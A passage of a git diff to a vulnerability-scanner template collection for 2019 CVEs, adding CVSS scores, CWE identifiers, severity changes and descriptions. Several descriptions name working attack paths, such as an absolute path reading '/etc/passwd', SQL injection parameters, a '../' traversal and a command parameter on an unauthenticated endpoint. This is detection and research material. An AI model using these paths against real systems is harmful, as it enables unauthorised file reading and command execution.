8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability ." requests: - method: GET diff --git a/cves/2019/CVE-2019-11580.yaml b/cves/2019/CVE-2019-11580.yaml index a26ec36e14..095100bde7 100644 --- a/cves/2019/CVE-2019-11580.yaml +++ b/cves/2019/CVE-2019-11580.yaml @@ -21,6 +21,10 @@ info: reference: - https://github.com/jas502n/CVE-2019-11580 - https://jira.atlassian.com/browse/CWD-5388 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-11580 requests: - method: GET diff --git a/cves/2019/CVE-2019-11581.yaml b/cves/2019/CVE-2019-11581.yaml index ec056b1abc..0f8fb34038 100644 --- a/cves/2019/CVE-2019-11581.yaml +++ b/cves/2019/CVE-2019-11581.yaml @@ -7,6 +7,11 @@ info: severity: critical reference: https://github.com/jas502n/CVE-2019-11581 tags: cve,cve2019,atlassian,jira,ssti,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-11581 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 2053f87579..9c68042cfd 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -16,6 +16,11 @@ info: - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild - https://wpscan.com/vulnerability/9254 tags: cve,cve2019,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-11869 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2019/CVE-2019-12276.yaml b/cves/2019/CVE-2019-12276.yaml index a069b1acf1..a0cc848279 100644 --- a/cves/2019/CVE-2019-12276.yaml +++ b/cves/2019/CVE-2019-12276.yaml @@ -9,6 +9,11 @@ info: - https://security401.com/grandnode-path-traversal/ - https://www.cvedetails.com/cve/CVE-2019-12276 tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12276 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-12314.yaml b/cves/2019/CVE-2019-12314.yaml index a9e7754a57..6447b9ad1c 100644 --- a/cves/2019/CVE-2019-12314.yaml +++ b/cves/2019/CVE-2019-12314.yaml @@ -3,13 +3,18 @@ id: CVE-2019-12314 info: name: Deltek Maconomy 2.2.5 LFIl author: madrobot - severity: high + severity: critical tags: cve,cve2019,lfi description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. reference: http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt https://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-12314 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-12461.yaml b/cves/2019/CVE-2019-12461.yaml index c2dfd74c28..ea015d4b9d 100644 --- a/cves/2019/CVE-2019-12461.yaml +++ b/cves/2019/CVE-2019-12461.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS - https://webport.se/nedladdningar/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-12461 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-12593.yaml b/cves/2019/CVE-2019-12593.yaml index 5a28c889a4..2c649f6e12 100644 --- a/cves/2019/CVE-2019-12593.yaml +++ b/cves/2019/CVE-2019-12593.yaml @@ -13,6 +13,11 @@ info: - https://www.icewarp.com/downloads/trial/ # software link additional-fields: google-dork: Powered By IceWarp 10.4.4 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12593 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 00eb781972..6d8e56152d 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -10,6 +10,11 @@ info: - https://www.phpmyadmin.net/security/PMASA-2019-4/ - https://www.exploit-db.com/exploits/46982 - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2019-12616 + cwe-id: CWE-352 requests: - method: GET diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml index db7a7ffd97..ec398f19ae 100644 --- a/cves/2019/CVE-2019-12725.yaml +++ b/cves/2019/CVE-2019-12725.yaml @@ -13,6 +13,11 @@ info: - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-12725 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index 14ca50d4c4..747ee42f66 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-13101 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2019/CVE-2019-13462.yaml b/cves/2019/CVE-2019-13462.yaml index 41c5e358b9..7d3c23a851 100644 --- a/cves/2019/CVE-2019-13462.yaml +++ b/cves/2019/CVE-2019-13462.yaml @@ -7,6 +7,11 @@ info: reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/ description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI. tags: cve,cve2019,sqli,lansweeper + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2019-13462 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2019/CVE-2019-14205.yaml b/cves/2019/CVE-2019-14205.yaml index 05fcd12672..41b27f1e70 100644 --- a/cves/2019/CVE-2019-14205.yaml +++ b/cves/2019/CVE-2019-14205.yaml @@ -6,6 +6,11 @@ info: tags: cve,cve2019,wordpress,wp-plugin,lfi description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-14205 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml index 9e75997beb..8caabe4459 100644 --- a/cves/2019/CVE-2019-14223.yaml +++ b/cves/2019/CVE-2019-14223.yaml @@ -3,12 +3,17 @@ id: CVE-2019-14223 info: name: Alfresco Share Open Redirect author: pdteam - severity: low + severity: medium description: An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.). reference: - https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community tags: cve,cve2019,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14223 + cwe-id: CWE-601 requests: - method: POST diff --git a/cves/2019/CVE-2019-14312.yaml b/cves/2019/CVE-2019-14312.yaml index 33a5873d2d..ba83455a64 100644 --- a/cves/2019/CVE-2019-14312.yaml +++ b/cves/2019/CVE-2019-14312.yaml @@ -3,12 +3,17 @@ id: CVE-2019-14312 info: name: Aptana Jaxer 1.0.3.4547 - Local File inclusion author: daffainfo - severity: high + severity: medium description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. reference: - https://www.exploit-db.com/exploits/47214 - https://www.cvedetails.com/cve/CVE-2019-14312 tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-14312 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-14322.yaml b/cves/2019/CVE-2019-14322.yaml index 2aa82033aa..4c63be4e87 100644 --- a/cves/2019/CVE-2019-14322.yaml +++ b/cves/2019/CVE-2019-14322.yaml @@ -5,6 +5,15 @@ info: author: madrobot severity: high tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-14322 + cwe-id: CWE-22 + description: "In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames." + reference: + - https://palletsprojects.com/blog/werkzeug-0-15-5-released/ + - http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html requests: - method: GET diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 05400bc1a4..d956d7190a 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14470 + cwe-id: CWE-79 + description: "cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter." requests: - method: GET diff --git a/cves/2019/CVE-2019-14696.yaml b/cves/2019/CVE-2019-14696.yaml index 85799b6418..7188ec08ff 100644 --- a/cves/2019/CVE-2019-14696.yaml +++ b/cves/2019/CVE-2019-14696.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2019-14696 tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14696 + cwe-id: CWE-79 + description: "Open-School 3.0, and Community Edition 2.3, allows XSS via the osv/index.php?r=students/guardians/create id parameter." requests: - method: GET diff --git a/cves/2019/CVE-2019-14974.yaml b/cves/2019/CVE-2019-14974.yaml index 6bc08641a7..66654e66ed 100644 --- a/cves/2019/CVE-2019-14974.yaml +++ b/cves/2019/CVE-2019-14974.yaml @@ -3,8 +3,16 @@ id: CVE-2019-14974 info: name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting author: madrobot - severity: low + severity: medium tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14974 + cwe-id: CWE-79 + description: "SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS." + reference: + - https://www.exploit-db.com/exploits/47247 requests: - method: GET diff --git a/cves/2019/CVE-2019-15043.yaml b/cves/2019/CVE-2019-15043.yaml index dddcb93e9e..94b48eecc8 100644 --- a/cves/2019/CVE-2019-15043.yaml +++ b/cves/2019/CVE-2019-15043.yaml @@ -2,13 +2,18 @@ id: CVE-2019-15043 info: author: bing0o name: Grafana unauthenticated API - severity: medium + severity: high description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. reference: - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - https://community.grafana.com/t/release-notes-v6-3-x/19202 tags: cve,cve2019,grafana + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2019-15043 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index 9d736b993d..7f6616f3c8 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -3,10 +3,15 @@ id: CVE-2019-15107 info: name: Webmin <= 1.920 Unauthenticated Remote Command Execution author: bp0lr - severity: high + severity: critical description: An issue was discovered in Webmin <=1.920. The 'old' parameter in password_change.cgi contains a command injection vulnerability. reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html tags: cve,cve2019,webmin,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-15107 + cwe-id: CWE-78 requests: - raw: # diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index 3481874161..f1cdb338d5 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -9,6 +9,12 @@ info: - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15501 + cwe-id: CWE-79 + description: "Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter." requests: - method: GET diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index e2cf961b99..052732aa1e 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/9267 - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15713 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-15858.yaml b/cves/2019/CVE-2019-15858.yaml index 104ee2be4e..0516be3ea1 100644 --- a/cves/2019/CVE-2019-15858.yaml +++ b/cves/2019/CVE-2019-15858.yaml @@ -13,6 +13,11 @@ info: reference: https://github.com/GeneralEG/CVE-2019-15858 tags: cve,cve2019,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2019-15858 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2019/CVE-2019-15859.yaml b/cves/2019/CVE-2019-15859.yaml index cfdbc56cc2..3d33b1df7c 100644 --- a/cves/2019/CVE-2019-15859.yaml +++ b/cves/2019/CVE-2019-15859.yaml @@ -7,6 +7,11 @@ info: reference: https://seclists.org/fulldisclosure/2019/Oct/10 severity: critical tags: cve,cve2019,disclosure,socomec,diris,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-15859 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2019/CVE-2019-15889.yaml b/cves/2019/CVE-2019-15889.yaml index 6ccc20b699..66a57ec7c5 100644 --- a/cves/2019/CVE-2019-15889.yaml +++ b/cves/2019/CVE-2019-15889.yaml @@ -9,6 +9,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 - https://www.cybersecurity-help.cz/vdb/SB2019041819 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15889 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml index bbcb4dd03f..a22723a7a2 100644 --- a/cves/2019/CVE-2019-16097.yaml +++ b/cves/2019/CVE-2019-16097.yaml @@ -2,13 +2,18 @@ id: CVE-2019-16097 info: name: Harbor Enables Privilege Escalation From Zero to admin author: pikpikcu - severity: critical + severity: medium description: | core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP. reference: - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ - https://github.com/goharbor/harbor/issues/8951 tags: cve,cve2019,intrusive,harbor + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2019-16097 + cwe-id: CWE-862 requests: - method: POST diff --git a/cves/2019/CVE-2019-16278.yaml b/cves/2019/CVE-2019-16278.yaml index 21efd21490..ca568b2722 100644 --- a/cves/2019/CVE-2019-16278.yaml +++ b/cves/2019/CVE-2019-16278.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.exploit-db.com/raw/47837 tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16278 + cwe-id: CWE-22 + description: "Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request." requests: - raw: diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml index e1bd078ded..8a154f7dff 100644 --- a/cves/2019/CVE-2019-16313.yaml +++ b/cves/2019/CVE-2019-16313.yaml @@ -9,6 +9,11 @@ info: - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 tags: cve,cve2019,exposure,router,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-16313 + cwe-id: CWE-798 requests: - method: GET diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index 4f4f37861c..988cb5d0d9 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -9,6 +9,11 @@ info: - https://plugins.trac.wordpress.org/changeset/2152730 - https://wordpress.org/plugins/api-bearer-auth/#developers tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-16332 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml index c2ccc90357..c0b2649797 100644 --- a/cves/2019/CVE-2019-16525.yaml +++ b/cves/2019/CVE-2019-16525.yaml @@ -7,6 +7,11 @@ info: description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-16525 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-1653.yaml b/cves/2019/CVE-2019-1653.yaml index 34e5db456d..3428aaef8e 100644 --- a/cves/2019/CVE-2019-1653.yaml +++ b/cves/2019/CVE-2019-1653.yaml @@ -10,6 +10,11 @@ info: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info - https://www.exploit-db.com/exploits/46262/ - https://www.exploit-db.com/exploits/46655/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-1653 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2019/CVE-2019-16662.yaml b/cves/2019/CVE-2019-16662.yaml index 592bff2265..7ab910ea7e 100644 --- a/cves/2019/CVE-2019-16662.yaml +++ b/cves/2019/CVE-2019-16662.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ tags: cve,cve2019,rce,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16662 + cwe-id: CWE-78 + description: "An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution." requests: - method: GET diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml index 7c3e049ff8..7917672a21 100644 --- a/cves/2019/CVE-2019-16759.yaml +++ b/cves/2019/CVE-2019-16759.yaml @@ -3,9 +3,15 @@ id: CVE-2019-16759 info: name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass author: madrobot - severity: high + severity: critical reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ tags: cve,cve2019,vbulletin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16759 + cwe-id: CWE-94 + description: "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request." requests: - raw: diff --git a/cves/2019/CVE-2019-16920.yaml b/cves/2019/CVE-2019-16920.yaml index 2ac46ac67b..c45dc73829 100644 --- a/cves/2019/CVE-2019-16920.yaml +++ b/cves/2019/CVE-2019-16920.yaml @@ -7,6 +7,11 @@ info: description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r tags: cve,cve2019,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16920 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2019/CVE-2019-17270.yaml b/cves/2019/CVE-2019-17270.yaml index 3b9928363a..35d7049dea 100644 --- a/cves/2019/CVE-2019-17270.yaml +++ b/cves/2019/CVE-2019-17270.yaml @@ -3,13 +3,18 @@ id: CVE-2019-17270 info: name: Yachtcontrol Webapplication 1.0 - Unauthenticated Rce author: pikpikcu - severity: high + severity: critical reference: - https://www.exploit-db.com/exploits/47760 - https://nvd.nist.gov/vuln/detail/CVE-2019-17270 description: | A vulnerability in Yachtcontrol makes it possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's. tags: rce,yachtcontrol,cve,cve2019 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-17270 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index d25a72cee2..163e4ead10 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -7,6 +7,11 @@ info: description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. reference: https://www.exploit-db.com/exploits/47467 tags: cve,cve2019,zabbix,fuzz + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2019-17382 + cwe-id: CWE-639 requests: - raw: diff --git a/cves/2019/CVE-2019-17503.yaml b/cves/2019/CVE-2019-17503.yaml index beca789136..a3b8e66c08 100644 --- a/cves/2019/CVE-2019-17503.yaml +++ b/cves/2019/CVE-2019-17503.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/47498 - https://nvd.nist.gov/vuln/detail/CVE-2019-17503 tags: cve,cve2019,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-17503 + cwe-id: CWE-425 requests: - method: GET diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml index 3a6a05e8f2..0dbb3edcee 100644 --- a/cves/2019/CVE-2019-17506.yaml +++ b/cves/2019/CVE-2019-17506.yaml @@ -7,6 +7,11 @@ info: description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. reference: https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py tags: cve,cve2019,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-17506 + cwe-id: CWE-306 requests: - method: POST diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 4051eaaa7e..a1a7023154 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -6,6 +6,12 @@ info: reference: https://github.com/shi-yang/jnoj/issues/53 tags: cve,cve2019,jnoj,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-17538 + cwe-id: CWE-22 + description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring." requests: - raw: - | diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index b7c1855604..dc6c7b9786 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -2,9 +2,15 @@ id: 